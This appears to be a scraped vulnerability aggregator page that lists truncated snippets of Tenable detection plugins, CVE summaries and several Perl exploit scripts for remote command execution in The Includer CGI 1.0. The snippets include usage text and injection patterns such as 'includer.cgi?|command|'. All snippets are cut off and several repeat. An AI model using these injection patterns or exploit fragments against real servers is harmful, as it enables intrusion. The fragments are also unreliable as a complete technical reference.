Websense Reporting Console Detection

The remote host appears to be running Websense, and connections are allowed to the web reporting console. A remote attacker could use information gathered from this access to mount further attacks. C Tenable Network Security, Inc. include"compat.inc"; ifdescription scriptid18177;...

PHP, ASP, CGI web applications security vulnerabilities

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

CVE-2005-1355

CVE-2005-1355 affects includer.cgi in The Includer and enables remote attackers to read arbitrary files by supplying a full pathname in the argument (a directory traversal issue). The connected record for CVE-2005-0801 confirms the pattern: directory traversal via .. or a full pathname in the URL...

CVE-2005-1344

Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is...

remote command execution in inserter.cgi script

Tunis 24/04/2005 BUG found by fireboy [email protected] THERE ARE SOME BUGS IN inserter.cgi SCRIPT THAT CAN SHOW SENSILBLES FILES IN A SYSTEM OR EXECUTE COMMANDS IN THE TARGET HOST WICH CAN COMPROMISE IT. IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 1file showing...

Horde Turba Detection

The remote host is running Turba, a PHP-based addressbook / contact management utility from the Horde Project. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid18137; scriptversion"1.24"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/10/12";...

CVE-2001-1457

Buffer overflow in CrazyWWWBoard 2000p4 and 2000LEp5 allows remote attackers to execute arbitrary code via a long HTTPUSERAGENT CGI environment variable...

CVE-2001-1457

CVE-2001-1457 concerns buffer overflow in CrazyWWWBoard 2000p4 and 2000LEp5. The underlying issue is a vulnerability in handling a long HTTP_USER_AGENT CGI environment variable, allowing a remote attacker to potentially execute arbitrary code. Affected software is CrazyWWWBoard 2000 series (p4 an...

includer10.pl.txt

Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print " incl10.pl 127.0.0.1 / "uname -a"\n"; print " incl10.pl...

PHP: Multiple vulnerabilities

Background PHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the modphp module or the CGI version of PHP, or can run stand-alone in a CLI. Description An integer overflow and an unbound recursion were discovered in the...

Serendipity Detection

Serendipity, a PHP-based blog application, is running on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid18054; scriptversion"1.19"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/06/01"; scriptnameenglish:"Serendipity Detection";...

PHP, ASP, CGI web applications security vulnerabilities

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

The Includer CGI 1.0 - Remote Command Execution (3)

The Includer CGI 1.0 - Remote Command Execution 3 !/usr/bin/perl K-C0d3r Includer.cgi 1.0 remote command execution K-C0d3r C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! I think the bug was discovered by Francisco Alisson. Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. FK of to al...

The Includer CGI <= 1.0 Remote Command Execution (new version)

Exploit for cgi platform in category web applications ============================================================== The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.p...

The Includer CGI &lt;= 1.0 Remote Command Execution (new version)

No description provided by source. !/usr/bin/perl Target - The Includer CGI = 1.0 Based on - http://www.milw0rm.com/id.php?id=862 Info about bug - Stupid use "Open" function. If you want know more visit our home page at nst.void.ru use IO::Socket; if @ARGV 3 print " \n Includer CGI = 1.0 Network...

The Includer CGI 1.0 - Remote Command Execution (2)

The Includer CGI 1.0 - Remote Command Execution 2 !/usr/bin/perl Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print "...

The Includer CGI <= 1.0 Remote Command Execution (new version2)

Exploit for cgi platform in category web applications =============================================================== The Includer CGI .\n"; print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n"; exit; if @ARGV 3 Usage; $host = @ARGV0; $pa...

The Includer CGI 1.0 - Remote Command Execution (3)

!/usr/bin/perl K-C0d3r Includer.cgi 1.0 remote command execution K-C0d3r C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! I think the bug was discovered by Francisco Alisson. Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. FK of to all RxBot kiddies as et, Gn, db. kc@K-C0d3r xpl$ per...

The Includer CGI 1.0 - Remote Command Execution (2)

!/usr/bin/perl Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print " incl10.pl 127.0.0.1 / "uname -a"\n"; print "...

PHP, ASP, CGI web applications security vulnerabilities

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...